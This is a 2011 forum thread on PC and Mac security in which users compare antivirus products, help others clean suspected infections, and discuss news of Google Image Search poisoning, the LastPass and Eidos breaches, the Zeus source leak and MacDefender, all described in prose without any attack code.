Simple Ad block was the preferred ad blocker until they started charging for it. I’ve just been using the immunization features from Spybot SD, Spywareblaster, & a couple of tracking protection lists instead of an ad blocker since then. Yeah a few still get through but they don’t bother me that much.
Other than Spybot SD’s host file list I wouldn’t use any of those third parties that just dumps thousands of entries in. That’s actually been shown to slow browsing down because of the time checking and conflicts.
Besides MSE I would recommend Comodo’s free security suit. It does a great job and the av doesn’t conflict with MSE. It also seems to actually do a decent job.
My only complaint is the lack of a spell checker. I'm not a big fan of IE spell and IE7pro was really good but its just not working anymore. Google Tool bar has one as well but I don't want to have to use it.
TetraNitroCubaneThe DjinneratorAt the bottom of a bottleRegistered Userregular
edited May 2011
Thanks for the info, Dark Shroud. You've got me more and more interested in IE these days, particularly when it's paired with something like Sandboxie.
In other news, there's apparently been a rash of poisoned images floating around on Google Image Search. This vector is being used not only to target people using Windows machines, but is also operating to attack OS X machines (as described on the previous page). The Internet Storm Center has a more thorough breakdown here on their page. Copy and paste of the attack analysis is under the spoiler.
1. The attackers compromise a number of legitimate web sites. I have noticed that they usually attack Wordpress installations, but any widely spread software that has known vulnerabilities can be exploited.
2. Once the source (legitimate) web sites have been exploited, the attackers plant their PHP scripts, similar to those I described in previously mentioned diaries. These scripts vary from simple to very advanced scripts that can automatically monitor Google trend queries and create artificial web pages containing information that is currently interested. That is actually how they generate new content – if you ever wondered how they had those web sites about Bin Laden up quickly it is because they automatically monitor the latest query trends and generate web pages with artificial content.
These web sites contain not only text, but also images that are acquired from various web sites. Again, their scripts use various search engines to locate these pictures (I will probably post a diary about this soon too). They embed links to pictures which are really related to the topic so the automatically generated web page contains real looking content.
3. Google now crawls through these web sites. The scripts that the attackers put will detect Google’s bots (either by their IP address or the User Agent) and will deliver special pages back containing automatically generated content. Google will also parse links to images and, if appropriate, populate the image search database.
4. Now, when a user searches for something through the Google image search function, thumbnails of pictures are displayed. Depending on the automatically generated content in step 3), number of links to the web page and other parameters known to Google, the attacker’s page will be shown at a certain position in the results web page. The exploit happens when a user clicks on the thumbnail.
Google now shows a special page that shows the thumbnail in the center of the page, links to the original image (no matter where it is located) on the right and the original web site (the one that contained the image) in the background. This is where the “vulnerability” is. Google displays this in a simple iframe:
The user’s browser will automatically send a request to the bad page which runs the attacker’s script (the one set in step 1). This script checks that the request’s referrer field and if it contains Google (meaning this was a click on the results page in Google), the script displays a small JavaScript script:
This causes the browser to be redirected to another site that is serving FakeAV.
Apparently Google isn't the only site getting hammered with malware lately. Most social networking sites were plagued with clickjacking and redirecting attacks in the wake of the Osama Bin Laden incident. Fraudsters love using hot-topic issues to lure people into their infected pages, and so Facebook and Twitter have been alight with malware, not to mention Search Engine Optimization techniques on most of the major search pages.
Bottom line for most of these attacks: If you're running some sort of script and pluging control with your browser, you're most likely safe. The attacks redirect you to a malicious page where a script attack is launched, so NoScript or a browser whitelist are good protections against such infection attempts.
Well the first thing is IE7 was the first browser to have it's own sandbox mode built in. I just like to recommind people of this. PA forums aren't too bad but I get tired of not being able to have conversations about browsers without Firefox & Chome fanboys being completely rude pricks.
Second thing is Comodo has a better sandbox that sandboxie and its free in their free security suit. If you're into that kind of security it's really worth looking into.
Well the first thing is IE7 was the first browser to have it's own sandbox mode built in. I just like to recommind people of this. PA forums aren't too bad but I get tired of not being able to have conversations about browsers without Firefox & Chome fanboys being completely rude pricks.
Second thing is Comodo has a better sandbox that sandboxie and its free in their free security suit. If you're into that kind of security it's really worth looking into.
Protected mode for EI 7 was only built into Vista. On xp (the vast majority of machines), it only moved active x away from being run by explorer into another iexplore thread. It ended up being pretty damn ineffective in both cases. Back then, any browser was better by virtue of not being able to use active x as the majority of attack vectors used it.
Looks like LastPass got somewhat pwned as well, so everyone using the service should go and rush to change your password to find everyone is doing that at the moment so it's overloaded and you can't do shit.
To be fair to them, they're handling whatever happened a bit better than Sony did.
yotes on
[SIGPIC][/SIGPIC]
0
Options
TetraNitroCubaneThe DjinneratorAt the bottom of a bottleRegistered Userregular
Looks like LastPass got somewhat pwned as well, so everyone using the service should go and rush to change your password to find everyone is doing that at the moment so it's overloaded and you can't do shit.
To be fair to them, they're handling whatever happened a bit better than Sony did.
Holy crap, thanks for the update. What is with the internet lately? Leaking like a sieve.
I do admire how up front about the entire process that update from LastPass is - from what they noticed to their immediate actions in reply to it. Also, it sounds like they must be using a decent hash, too.
If you have a strong, non-dictionary based password or pass phrase, this shouldn't impact you - the potential threat here is brute forcing your master password using dictionary words, then going to LastPass with that password to get your data. Unfortunately not everyone picks a master password that's immune to brute forcing.
Still, changing the master password might still be a good idea.
Start up Hitman Pro again, then click the settings button in the lower left. From there, you should see a tab on the top row, with one of the options listed as "History".
Edit response: Judging by the filename and the location, I'm going to say that it's looking more and more like malware. Randomized-name DLL files hiding in temporary folders tend to be bad news. One thing you might try for more 'subtle' verification is this: Reboot your computer. When it restarts, be on the lookout for an error message about that DLL file not being loaded. If that does, in fact, happen, then something in your registry is actively trying to load that weirdo DLL - And you've got some malware on your hands.
If no errors pop up, scan with Hitman again. Rootkits typically have more than one component in operation, where component A watches B and C, B watches A and C, and C watches A and B. If one of A, B, or C get knocked out, then the other components replace it. So there's a chance that, if the infection is still active, the dll could be regenerated and Hitman will find it once more after rebooting.
Going to have to say, though, that it's sounding more and more like a reformat might be your best bet. Or at the very least, a LiveCD or RescueCD second opinion. Sorry for the downer.
No error messages on startup, and Hitman didn't find any additional hazardous files.
I happen to have a UBCD4Win boot disc, and a UBCD boot disc. If I boot from a disc, what do I then do to scan my computer? Go to a site, like Housecall or back to the Hitman site?
Peter Principle on
"A man is likely to mind his own business when it is worth minding. When it is not, he takes his mind off his own meaningless affairs by minding other people's business." - Eric Hoffer, _The True Believer_
Protected mode for EI 7 was only built into Vista. On xp (the vast majority of machines), it only moved active x away from being run by explorer into another iexplore thread. It ended up being pretty damn ineffective in both cases. Back then, any browser was better by virtue of not being able to use active x as the majority of attack vectors used it.
First off if you care about security you don't use WinXP. Second IE7 also changed the ability for ActiveX controls to auto run by default. I used to set IE6 & previous versions to do this manually. Now in newer versions ActiveX controls have to be signed to even prompt the user to allow them to run.
I used to go to malicious sites to test brower settings. I would get a good laugh when the pages loaded in Opera and would ask me to run IE or Firefox.
Chrome calls their version of ActiveX Native Code.
Protected mode for EI 7 was only built into Vista. On xp (the vast majority of machines), it only moved active x away from being run by explorer into another iexplore thread. It ended up being pretty damn ineffective in both cases. Back then, any browser was better by virtue of not being able to use active x as the majority of attack vectors used it.
First off if you care about security you don't use WinXP. Second IE7 also changed the ability for ActiveX controls to auto run by default. I used to set IE6 & previous versions to do this manually. Now in newer versions ActiveX controls have to be signed to even prompt the user to allow them to run.
I used to go to malicious sites to test brower settings. I would get a good laugh when the pages loaded in Opera and would ask me to run IE or Firefox.
Chrome calls their version of ActiveX Native Code.
Reality very rarely follows what is theoretically best. Vista had a 70%+ rejection rate and many businesses, especially smaller ones, couldn't financially or otherwise technically upgrade. Peripheral compatibility for consumers was a joke up until SP1 and was non existent for businesses. The software situation was much worse as much of the underpinnings were changed, it forced people to either stick with xp or upgrade their software. In some situations it was impossible as the vendors didn't even release compatible versions. Certainly, there were workarounds in many cases but most were financially untenable.
As for ie7, there were flaws that allowed the new security features to be completely bypassed (iirc within the first two weeks of the official release). I can't think of a single machine I had to clean that didn't have install activex bar disabled. It quickly became irrelevant anyway as we moved towards the situation we are in now where the majority of attacks are in combination - ie: using js and an iframe to load a pdf, flash or jar file (sometimes all three) in order to gain entry to the system. A security warning for loading controls does no good when those already installed are vulnerable, regardless of the browser running them.
stigweard on
0
Options
TetraNitroCubaneThe DjinneratorAt the bottom of a bottleRegistered Userregular
Start up Hitman Pro again, then click the settings button in the lower left. From there, you should see a tab on the top row, with one of the options listed as "History".
Edit response: Judging by the filename and the location, I'm going to say that it's looking more and more like malware. Randomized-name DLL files hiding in temporary folders tend to be bad news. One thing you might try for more 'subtle' verification is this: Reboot your computer. When it restarts, be on the lookout for an error message about that DLL file not being loaded. If that does, in fact, happen, then something in your registry is actively trying to load that weirdo DLL - And you've got some malware on your hands.
If no errors pop up, scan with Hitman again. Rootkits typically have more than one component in operation, where component A watches B and C, B watches A and C, and C watches A and B. If one of A, B, or C get knocked out, then the other components replace it. So there's a chance that, if the infection is still active, the dll could be regenerated and Hitman will find it once more after rebooting.
Going to have to say, though, that it's sounding more and more like a reformat might be your best bet. Or at the very least, a LiveCD or RescueCD second opinion. Sorry for the downer.
No error messages on startup, and Hitman didn't find any additional hazardous files.
I happen to have a UBCD4Win boot disc, and a UBCD boot disc. If I boot from a disc, what do I then do to scan my computer? Go to a site, like Housecall or back to the Hitman site?
There should be a number of tools already on the UBCD, I believe, for scanning. Hopefully you'll boot into a network aware capacity, and be able to update them. Alternatively, you can scan with something you've downloaded, like MBAM or Hitman again.
The other alternative is to use a rootkit scanner, something like rootkit revealer, f-secure blacklight, Sophos Anti-rootkit, or the mighty GMER. However, use caution when acting on information from these anti-rootkit tools. They are powerful, but their output can be hard to decode. Rather than just saying "Hey! Here's a rootkit!" they typically display files, hooks, and processes that show rootkit like behavior. For example, both Daemon tools and SecuROM DRM set off rootkit revealer, and 'removing' either of them will render them inoperative. So it's possible you can damage a legitimate file/proces if you're too hasty, and it's always best to investigate further when you get positives from any of these tools. Typically it's best to Google the results flagged as suspicious, or get the advice of experts.
TetraNitroCubane on
0
Options
TetraNitroCubaneThe DjinneratorAt the bottom of a bottleRegistered Userregular
edited May 2011
Hey everyone! It's time for your favorite song and dance! New vulnerabilities have been disclosed for Adobe Flash, with exploits and attacks surfacing in the wild. So go ahead and grab the latest version to patch that up - keeping in mind to avoid unwanted toolbars on installation (if you use the installer, rather than manual methods).
CHANGE PLACES!
TetraNitroCubane on
0
Options
OrcaAlso known as EspressosaurusWrexRegistered Userregular
edited May 2011
One day, Adobe flash will be secure.
It will be because everyone has abandoned that piece of junk platform.
Orca on
0
Options
TetraNitroCubaneThe DjinneratorAt the bottom of a bottleRegistered Userregular
It will be because everyone has abandoned that piece of junk platform.
Quite agreed. I'm wondering if HTML5 is going to be much more secure than flash, personally.
In other news: It looks like another case of server-side hacking has occurred, this time on the Eidos and Human Revolution websites. Joystiq has a more complete story. Looks like mostly email addresses were stolen, though apparently up to 350 job applications were also pinched. Seems pretty minor compared to some other leaks lately (not much personal data was collected for regular users, no passwords or secret questions - just emails addresses), but it's still worrisome that the server-side aspect of out web-experience is the juicy (and vulnerable) target these days.
This past Wednesday, hackers reportedly broke into the Eidos and Deus Ex: Human Revolution websites, erecting an "Owned by Chippy1337" banner and signing some names and aliases below (a possible red herring). In IRC chat logs, obtained by former Washington Post reporter Brian Krebs, the hackers also claim to have stolen the personal data of "at least" 80,000 users. So, first things first: If you've registered on an Eidos site or with the Deus Ex site, now's the time to change your password (we should all be used to this by now).
Eurogamer has spoken with "Venuism," one of the hackers implicated in the theft, who clarified that the "src" (source code) the hackers allegedly obtained pertains to the Deus Ex website and not the actual game. As of this writing, the Deus Ex website still isn't back to normal, while Eidos.com, which was also apparently compromised, appears fine now. (Venuism maintains that he and the others listed below the banner have been set up by a rival group.)
Most troubling, Venuism suggested that the stolen user data -- the extent of which is unclear -- had already been leaked. We've contacted Eidos parent company Square Enix for an official comment on the situation.
And here's the full statement issued by Square-Enix in reply to this:
"Square Enix can confirm a group of hackers gained access to parts of our Eidosmontreal.com website as well as two of our product sites. We immediately took the sites offline to assess how this had happened and what had been accessed, then took further measures to increase the security of these and all of our websites, before allowing the sites to go live again. Eidosmontreal.com does not hold any credit card information or code data, however there are resumes which are submitted to the website by people interested in jobs at the studio. Regrettably up to 350 of these resumes may have been accessed, and we are in the process of writing to each of the individuals who may have been affected to offer our sincere apologies for this situation. In addition, we have also discovered that up to 25,000 email addresses were obtained as a result of this breach. These email addresses are not linked to any additional personal information. They were site registration email addresses provided to us for users to receive product information updates. No dissemination or misappropriation of any other personal information has been identified at this point. We take the security of our websites extremely seriously and employ strict measures, which we test regularly, to guard against this sort of incident."
Late Edit: Sorry to pile on the thread, but I just read this over at Wilders, and it rather disturbed me. Apparently the source code for the notorious Zeus banking trojan has been released to the masses as freeware. The trojan used to be available only for purchase in certain underground rings, but now it's apparently easy to grab for no money at all. Softpedia has a more complete story here.
Observers were taken by surprise in January when someone other than Gribodemon posted announcements on underground forums that the ZeuS source code is available for sale.
The version advertised was 2.0.8.9, which apparently is the same as the one of the package being distributed now for free.
"This weekend we found the complete source code for this crime kit being leaked to the masses on several underground forums as well as through other channels.
"[...] We even compiled it in our lab and it works like a charm," announced Peter Kruse, security specialist at Danish IT security firm CSIS Security Group.
The existence of a password-protected .rar archive allegedly containing the ZeuS source code has been known for several weeks now, but researchers believed it served to showcase the project's file tree.
This is the first report of working ZeuS source code being available for free, which opens up the door to a lot of possibilities. Any malware writer can now theoretically create a version of the trojan with any modifications they desire.
Hopefully, the availability of the code will also help antivirus vendors to create better signatures that are able to detect most variations of the trojan.
Not enough for that situation. Zeus was, and remains, quite nasty. It has been able to regularly evade antivirus detections, and has been responsible for some rather huge botnets, worldwide. Let's hope the vendors are keyed into this, and the freeware source is enough to bolster their detections.
I just have a quick question. I get Norton Security Suite with my Comcast internet subscription. Would it be more advisable to use it, or something like Windows Security Essentials or Avast (which I've read nothing but glowing recommendations for)?
I'm guessing WSE and Avast get recommended so ofter because they're free. But if Norton is also free, how does it compare to those two?
TheCanMan on
0
Options
TetraNitroCubaneThe DjinneratorAt the bottom of a bottleRegistered Userregular
I just have a quick question. I get Norton Security Suite with my Comcast internet subscription. Would it be more advisable to use it, or something like Windows Security Essentials or Avast (which I've read nothing but glowing recommendations for)?
I'm guessing WSE and Avast get recommended so ofter because they're free. But if Norton is also free, how does it compare to those two?
Historically, Norton is a piece of shit. It used to be extremely bloated, and didn't offer good protection. I've not used it in almost a decade at this point, but from what I understand the latest offerings have really changed, and Symantec are trying hard to make the software much better. I have heard surprisingly good reviews about Norton 360, but I unfortunately have no firsthand experience with it.
When it comes to efficacy, it's extremely difficult to tell you which suite is going to be best. MSE and Avast do come with high recommendations - not only because they are free, but because they do perform well in tests. Norton Security Suite, I believe, is essentially Norton 360 with some other applications bundled in. If it's running on the same core as Symantec's corporate antivirus, then Antivirus Comparatives ranked them fairly competitively last year - though they didn't do well in the proactive scanning (i.e. detecting unknown threats).
In the end, finding any of those three choices will do well for you. None of them are going to give you 100% protection, so ensure you're using other defensive measures (sandboxing and/or rights dropping), particularly for your browser (Some form of script controlling and flash blocking is highly recommended). Usually it's all going to boil down to which of the three antivirus suites runs smoothest and has the best interface for you. Sometimes people complain about bloat with Avast, and I've even seen some issues with MSE being resource-intensive. Others see no such thing. This all seems to be very case-by-case. Essentially, figuring out which offering is most compatible with your system and habits is going to be the best deciding factor - When it comes to protection, it's almost impossible to give a good analysis, since each of the three options will catch and/or miss threats the other two miss/catch.
Sorry to not give a more clear-cut answer, but in my experience there's really no "best" antivirus out there. If we were talking two or three years ago, I'd tell you to avoid Norton like the plague, but they've been working hard to turn it around.
Cool, thanks. That's pretty much all I wanted to hear. I've been using Norton so I'll probably just keep on doing that. Just wanted to make sure it wasn't an inferior option.
TheCanMan on
0
Options
joshgotroDeviled EggThe Land of REAL CHILIRegistered Userregular
edited May 2011
I think this is the right thread. All of a sudden consent.exe is running and it wants consent to run setup##############.exe and every time I deny it it pops up again with another setup###.exe file asking for consent.
The setup executable is creating new .exes in my Temp folder. I can watch it create a new .exe.
HELP.
Edit:
Windows Vista, all up to date, and running AVG up to date.
TetraNitroCubaneThe DjinneratorAt the bottom of a bottleRegistered Userregular
edited May 2011
I completely echo Dark Shroud on this one: Get yourself Malwarebytes, install it, update it, and run a full system scan. The fact that something is continuously trying to launch shady EXEs is worrisome. Hopefully you can stop it in normal mode, but if the consent.exe spam gets too heavy, you might have to boot into safe mode to get control of the machine enough to run a scan.
After running Malwarebytes, I'd run a secondary scan with AVG, or some other antivirus, as well.
Can anyone recommend a good Linux AV scanner? I run Puppy Linux off a USB drive and need a good AV for it.
I admit I don't have experience with Linux when it comes to running AV, but here are some of the options I've heard of:
ESET NOD for Linux - This just recently left beta, and so is now retail software. Unfortunately that means it's going to cost money, but it's freakin' NOD, so the quality and detections are what you pay for. Still, might be overkill, and probably not the best thing for a mobile installation.
ClamAV - The open source Antivirus solution. People swear by it, but personally I loathe Clam. It's clunky, it's slow, the definitions always lag behind the curve, and it doesn't have on-access scanning. If you're looking for a free on-demand scanner, this will fit the bill in a pinch, but I think there are better options out there. I admit, I'm biased because I've had the OS X version miss some obviously bad files in the past, so I consider their definitions suspect.
Avast! Linux home edition - Avast! released a Linux version of their software for free. It seems to have a frontend GUI as well as command line accessibility, and the ability to automatically update itself. If it plays nice with a mobile install, this might be a good option for a rescue scanner.
AVG Linux free edition - What it says on the tin, AVG for Linux. Many people complain about bloat with AVG, but I'm uncertain as to how it performs with Linux. Still, it's another option if you wish to check it out.
Oh wait no it is actually older. Happy belated birthday, thread.
Samir Duran Duran on
0
Options
TetraNitroCubaneThe DjinneratorAt the bottom of a bottleRegistered Userregular
edited May 2011
Good gravy, has it been that long? I really need to get around to writing a new guide, preferably a visual one.
But anyhow, thanks all the help everyone's been doling out, as well as the conversation and input. What a weird year it's been, too, from Stuxnet to the PSN hack. Here's to staying safe for another year.
And all you have to do to get infected is stumble apon a page serving it, accept the offer to "clean your machine", download the zip, if it doesn't automatically extract, extract it, double click the package, click through several install screens and give it an administrator's username and password.
So long as you're not a complete silly goose, you can still be smug and elitist.
Trentus on
0
Options
TetraNitroCubaneThe DjinneratorAt the bottom of a bottleRegistered Userregular
edited May 2011
I've been holding my tongue and trying to avoid spamming the thread over it, but the Mac Malware situation has gotten a bit worse since the initial report posted last page. It's noteworthy, not because of the fact that the malware is particularly aggressive or damaging, but because it indicates that criminals are taking notice.
I'm going to soapbox a bit here (And keep in mind that this is coming from someone who uses both platforms, and spends an increasing amount of time on OS X): 'Out of the box' OS X and Apple products are more secure than their Windows counterparts. This has nothing to do with software design on a fundamental level, but rather with decisions to keep legacy support in newer versions of Windows. OS X has always respected the principle of least privilege, but Windows can't do that without borking a shitload of software, so they avoid it. So, granted, point in Apple's favor.
But who cares? In my opinion it is actually easier to make a Windows machine more secure than an OS X machine. This is because people recognize there are security issues to be dealt with, and software is available to handle those issues - Usually for free! Instead, Apple and OS X users decide that they're fucking invincible, and how dare you imply otherwise.
Make no mistake, the largest security threat against the Apple brand at the moment is hubris. They have cultivated an image for their platform which invokes the idea that nothing bad can ever happen to the end user. Which is precisely why their end users are more likely to fall victim to social engineering attacks. What good is the principle of least privilege if your user is so confident in his/her inability to get infected that they download, install, and input passwords without thinking? Or run Safari with 'Execute Trusted Files on Download' activated?
The prevailing attitude in the community, particularly on the Apple forums, is "You'll never get infected... Unless you're a moron!" The blame for infection is always heaped on the user, never on the software or the brand that perpetuates a juicy hotbed of social engineering tactics. And then, let's not start about the semantic arguments. Yes, I know there are no know viruses for OS X. Viruses also constitute a small and shrinking portion of PC malware. Besides that, OS X still has plenty of trojans, backdoors, and other malware - But I guess those aren't 'real' threats? Almost every fake AV attack is a trojan these days.
In the end, any software and any platform is as secure as you want it to be, and as secure as you make it. But the idea that OS X cultivates an image of "You don't need to make this secure"! Means that they train their users to be the silliest, most smug geese on the planet. Since OS X has been proven vulnerable at pwn2own several years running, I'd assume that now that sights have been leveled at the Apple brand, there's going to be some nasty developments in the future. Here's to hoping that Apple takes a more security conscious approach to user treatment in the future, rather than sweeping shit under the run.
And that was too much soap boxing. My apologies. I just wanted to get that out of my system for a few days, ever since reading through the Apple forums.
Because if I were to call up Microsoft for help with a malware infection they'd be so helpful, too. Oh, wait, no, they'll just suggest getting an antivirus. Which is exactly what Apple is doing (and should do).
I've been holding my tongue and trying to avoid spamming the thread over it, but the Mac Malware situation has gotten a bit worse since the initial report posted last page. It's noteworthy, not because of the fact that the malware is particularly aggressive or damaging, but because it indicates that criminals are taking notice.
I'm going to soapbox a bit here (And keep in mind that this is coming from someone who uses both platforms, and spends an increasing amount of time on OS X): 'Out of the box' OS X and Apple products are more secure than their Windows counterparts. This has nothing to do with software design on a fundamental level, but rather with decisions to keep legacy support in newer versions of Windows. OS X has always respected the principle of least privilege, but Windows can't do that without borking a shitload of software, so they avoid it. So, granted, point in Apple's favor.
But who cares? In my opinion it is actually easier to make a Windows machine more secure than an OS X machine. This is because people recognize there are security issues to be dealt with, and software is available to handle those issues - Usually for free! Instead, Apple and OS X users decide that they're fucking invincible, and how dare you imply otherwise.
Make no mistake, the largest security threat against the Apple brand at the moment is hubris. They have cultivated an image for their platform which invokes the idea that nothing bad can ever happen to the end user. Which is precisely why their end users are more likely to fall victim to social engineering attacks. What good is the principle of least privilege if your user is so confident in his/her inability to get infected that they download, install, and input passwords without thinking? Or run Safari with 'Execute Trusted Files on Download' activated?
The prevailing attitude in the community, particularly on the Apple forums, is "You'll never get infected... Unless you're a moron!" The blame for infection is always heaped on the user, never on the software or the brand that perpetuates a juicy hotbed of social engineering tactics. And then, let's not start about the semantic arguments. Yes, I know there are no know viruses for OS X. Viruses also constitute a small and shrinking portion of PC malware. Besides that, OS X still has plenty of trojans, backdoors, and other malware - But I guess those aren't 'real' threats? Almost every fake AV attack is a trojan these days.
In the end, any software and any platform is as secure as you want it to be, and as secure as you make it. But the idea that OS X cultivates an image of "You don't need to make this secure"! Means that they train their users to be the silliest, most smug geese on the planet. Since OS X has been proven vulnerable at pwn2own several years running, I'd assume that now that sights have been leveled at the Apple brand, there's going to be some nasty developments in the future. Here's to hoping that Apple takes a more security conscious approach to user treatment in the future, rather than sweeping shit under the run.
And that was too much soap boxing. My apologies. I just wanted to get that out of my system for a few days, ever since reading through the Apple forums.
Yes, this is more or less what I would have said if I hadn't felt like being snarky and lazy.
How's the state of MacOS antivirus nowadays? I hope it's not as dire as the Linux side. ClamAV can go eat a dick or five.
yotes on
[SIGPIC][/SIGPIC]
0
Options
TetraNitroCubaneThe DjinneratorAt the bottom of a bottleRegistered Userregular
Yes, this is more or less what I would have said if I hadn't felt like being snarky and lazy.
How's the state of MacOS antivirus nowadays? I hope it's not as dire as the Linux side. ClamAV can go eat a dick or five.
There are actual decent options available. Intego's Virus Barrier is supposed to be pretty good. Additionally, ESET have released their NOD Client for OS X. Believe it or not, there's also a free option, with Sophos Antivirus. Personally, I've been using NOD, but that's because I'm an ESET fanboy, and they've saved my bacon a few times in the past. I will note that most antivirus options on OS X suffer from a bit more system drag than the Windows counterparts, though. I attribute this to the kinks still being worked out. (And yes, ClamAV is awful, awful, awful)
Also... Okay, I swear I'm not trying to stir the pot here. After a few hours, I realized my above post probably came off as spiteful and vindictive, and I'm not trying to be petty. I like OS X, just as I like Windows 7, it's just that I don't like it when companies mislead their customers. So please forgive me if I flew off the handle.
That being said, Apple's response to the growing malware attacks (in the form of an internal memo) can be seen in this latest article. While I can understand that Apple doesn't want to be involved in recommending anti-malware software, I find it strange that the official policy is to not help people remove the malware - Mostly because it's been said time and time again that this malware is easy to remove. I suppose they have reasons for keeping the issue at an arms length, but I'm uncertain what it might be. I have to admit, I'm rather rubbed the wrong way by the bullet points at the end of the memo:
Look at it this way: While this particular bit of malware is easy to remove, some variant of it (or an entirely new virus/worm/whatever) that comes out later on may not be, and average end users don't understand that sort of distinction. Second, if AppleCare were to help remove it and the customer installed it again later on they would call in for help removing it again or call in angry that Apple didn't really remove it the first time. Then suppose MacDefender has then changed again and become harder to remove. At that point they're probably going to need an antivirus, anyway, so might as well just get one first thing and be done with it.
There's no reason to go to Tier 2 because there's nothing more to do: regular ol' tech support can suggest a few antivirus programs as easily as Tier 2 could, and contacting them is just wasting everyone's time. Likewise, the stores can't do anything for the same reasons AppleCare can't/doesn't. One thing that does baffle me, though, is the "do not confirm/deny" point. It's kind of obvious once you've installed MacDefender, after all...
Once again, this isn't anything new. Call up Microsoft sometime and ask them how to remove malware. They'll tell you the same thing: get an antivirus. Why Apple is singled out for this behavior is beyond me.
That said, I hope Apple updates the built in quasi-AV in Snow Leopard to take care of this thing. There's a precedent for it. And nothing it covers has gotten nearly as much press or spread as far as MacDefender has.
RBach on
[SIGPIC][/SIGPIC]
0
Options
TetraNitroCubaneThe DjinneratorAt the bottom of a bottleRegistered Userregular
edited May 2011
That's a very good point, and I can understand the logic behind not wanting to get involved. But there are a few things that I want to bring up before letting the issue rest.
First, the memo is unclear as to whether or not Apple will actually recommend installing antivirus. They do indicate telling afflicted users to visit the Apple Store, but they're also instructed specifically not to indicate that a problem exists (that first bullet point). Microsoft has a policy for security issues, quoted in that linked article above:
Microsoft provides free telephone support for security issues to all customers, regardless of whether the software was purchased at retail or as part of a new PC. Microsoft Support Article 129972 (last updated May 17, 2011) contains these instructions:
How to obtain computer virus and security-related support - For United States and Canada
The computer safety team is available for computer virus and for other security-related support 24 hours a day in the United States and in Canada.
To obtain computer virus and security-related support, follow these steps:
Before you contact a support engineer, make sure that you run updated antivirus software and updated spyware removal software on the infected computer.
For more information about how to obtain a free computer safety scan, visit the following Microsoft Web site: [url=http://www.microsoft.com/security/scanner/http://www.microsoft.com/security/scanner/[/url]
For more information about antispyware software, visit the following Microsoft Web site:http://www.microsoft.com/protect/computer/spyware/as.mspx
Call 1-866-PCSAFETY or call 1-866-727-2338 to contact security support.
The spoilered portion of that quote has recommendations and instructions to install and run antivirus before contacting support. The KB article from Microsoft in that quote also has a fairly nice rundown of what Viruses, Spyware, and Malware are. As well as a section specifically detailing the steps necessary to remove rouges, and reset your Proxy settings in case malware trashed it. Microsoft also release, every month, a malicious software removal tool that installs via automatic updates, and they provide a competitive antivirus solution for free.
Will their recommendation be 'Install an antivirus' if you call them up? Probably so, if you haven't already, but the information provided seems to indicate they'll also go through the pains to help you clear the infection. They'll certainly acknowledge the infection is a problem. They have a 24 hour support line specifically for this issue, and recommend that you install antivirus before calling it, so I'd assume they'll help you through to the end. This seems to contrast the Apple mentality. To be fair, history has necessitated this on the Microsoft end of things.
Second, don't get me started about that quasi-AV for Snow Leopard. It's a joke, plain and simple - unless, as you say, they update it at some point. It was lip service paid to the consumer at the launch of Snow Leopard to combat the two trojans in the wild at the time, and I assume that it became utterly useless within a week of Snow Leopard's release when the trojans were altered as they always are.
The reason I'm heaping on Apple here is because these attitudes just feed into the negative problems that are causing the issue to begin with. By refusing to acknowledge that a problem exists, they continue to perpetuate the image that nothing can go wrong with OS X. The reason people are falling for this MacDefender stuff is poor knowledge, which makes them a ripe social engineering target. If Apple were to be a bit more forthright about this, they could dampen the impact considerably.
I'm not trying to start a vicious argument here, so forgive me if I come off a bit snippy. OS X remains more secure than Windows in light of the current threat landscape, and I'm not trying to contest that fact. I also agree that there are some good reasons not to want to have call centers flooded with this issue, and that there's not much to be done on the tech's end of things. The official Apple word could just be a bit more sensitive to the customer who's plagued by this, and the 'head in the sand' approach to verifying the problem just sort of gets under my skin. Security starts with the user, and educating the user is more valuable than taking a silent approach.
Edit: Gadzooks, I talk too much. Apologies for piling on again.
Would a 40 digit number be a good password? I know that mixing characters, numbers, and special characters makes a stronger password, but if you've got 40 digits would that be strong enough? Maybe if I chuck a couple of letters in there somewhere too, like putting a word in the middle of it...
Because if I were to call up Microsoft for help with a malware infection they'd be so helpful, too. Oh, wait, no, they'll just suggest getting an antivirus. Which is exactly what Apple is doing (and should do).
If they'd suggest getting MSE, you'd already be one step ahead from it.
I've called, of all people, Zune tech support, and once they thought a problem I had might have been due to something that could be corrected by Malwarebyte. Yup, the one. I already had it, so that was a dead end. But I was a bit impressed that they'd suggest it. It was more than a year ago, perhaps, but they basically sent me a link to somewhere they'd hosted the client installer.
Synthesis on
0
Options
TetraNitroCubaneThe DjinneratorAt the bottom of a bottleRegistered Userregular
Would a 40 digit number be a good password? I know that mixing characters, numbers, and special characters makes a stronger password, but if you've got 40 digits would that be strong enough? Maybe if I chuck a couple of letters in there somewhere too, like putting a word in the middle of it...
A 40 digit number would be weaker than the corresponding length password containing characters and symbols, but to be honest I'm not sure how the security would stack up against attacks. Realistically, though, I think it'd be a larger question of practicality rather than security. First, you're going to need to know if the service/software you're using the password for is going to (A) accept only numeric digits (many require alphanumeric at least, if not demanding special characters, too), and (B) have limits on password length.
Overall, anything that's going to let you use 40 digits in a row would probably also allow you to use a passphrase, instead of a password. And it'd probably be easier to remember a passphrase with some numbers sprinkled in, rather than a password that's 40 digits long with a word in there somewhere.
I'm no cryptography expert, so that's just my $0.02. I know we've got some other, more skilled people on the board who can provide a more detailed answer than I can, though!
TetraNitroCubane on
0
Options
OrcaAlso known as EspressosaurusWrexRegistered Userregular
edited May 2011
Well, the first problem you'll run into is a lot of places won't let you use a 40 character password. Which is stupid, because a phrase is easier to remember than 15 characters of garbage. But that's how people tend to set up password systems. What's worse though is that it isn't always obvious that your password is too long and it's just been truncated--so you think you're good, but you're not. And then there's the password complexity rules TetraNitroCubane correctly points out.
Second, you're looking at 10^40 possible passwords by using just 40 digits. Very good, actually. Much better than most passwords unless they're getting to an obscene length. A password with a mix of numbers, mixed case letters, and symbols needs 20-21 characters to get similar complexity, which is already beyond what most people will memorize. Your not-so-average 10 character password with letters, numbers, and symbols is only looking at 10^19 possible passwords; 21 orders of magnitude less.
So if you can remember that sort of monolithic password, and if you only use it for one thing (avoid password reuse if you can), and if the place you want to use it in allows it, yeah, it's a good idea.
Cool, thanks. The number's engraved in my mind after I needed it for something else a few years ago, I don't need it any more but thought I could put it to good use. I know 10^40 is less combinations than a mix of all other characters, but would a hacker be able to see that I only had numbers? Wouldn't it, to them, still seem like 50^40 combinations (I'm guessing at the number of special characters)?
AnteCantelope on
0
Options
OrcaAlso known as EspressosaurusWrexRegistered Userregular
edited May 2011
A hacker wouldn't know unless the site you're using it for is doing something stupid with their security, in which case you're boned anyway. So as far as they're concerned it could be anything.
